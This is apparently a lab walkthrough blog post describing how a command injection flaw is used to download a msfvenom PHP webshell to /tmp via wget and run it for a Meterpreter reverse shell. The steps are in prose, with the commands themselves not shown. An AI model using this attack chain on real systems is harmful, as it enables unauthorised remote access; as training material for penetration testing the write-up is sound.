Friday, April 13, 2018

Command Injection (IV): Webshell -> Msfvenom / Meterpreter

Command Injection (IV): Webshell  -> Msfvenom / Meterpreter

- Layout for this exercise:

- This exercise is based on the previous one:

- The goal of this exercise is to achieve a meterpreter session by injecting a PHP webshell through the attacker's URL browser.

- First of all, let's have a look at options of the reverse_tcp, available with Metasploit:

- The only option required is LHOST, corresponding to the attacker's IP.

- Based on this payload, msfvenom generates the webshell pm.php:

- Opening the file, there are a couple of characters /* that must be removed to make the PHP script executable:

- At the attacker's side, let's open a SimpleHTTPServer listening on port 8000:

- Now, it is time to launch the attack using the wget command with -O indicating the folder where to allocate the output, in this case the folder /tmp.

- Why the folder /tmp? because it is a usual writable folder in most systems, what helps to bypass the problem of finding a writable area of memory where to store our malicious webshell pm.php:

- At the attacker's side, the successful transaction is registered:

- Also, the attacker Kali can check that this phase of the attack goes well, locating the transferred webshell pm.php at the folder /tmp:

 - Before running the webshell, let's open a listening session at the attacker's side (IP on port 4444) with a Metasploit handler:

- Finally, executing the webshell pm.php with the command php -f:

- The attack is successful because a meterpreter session is immediately achieved as a consequence of running the webshell: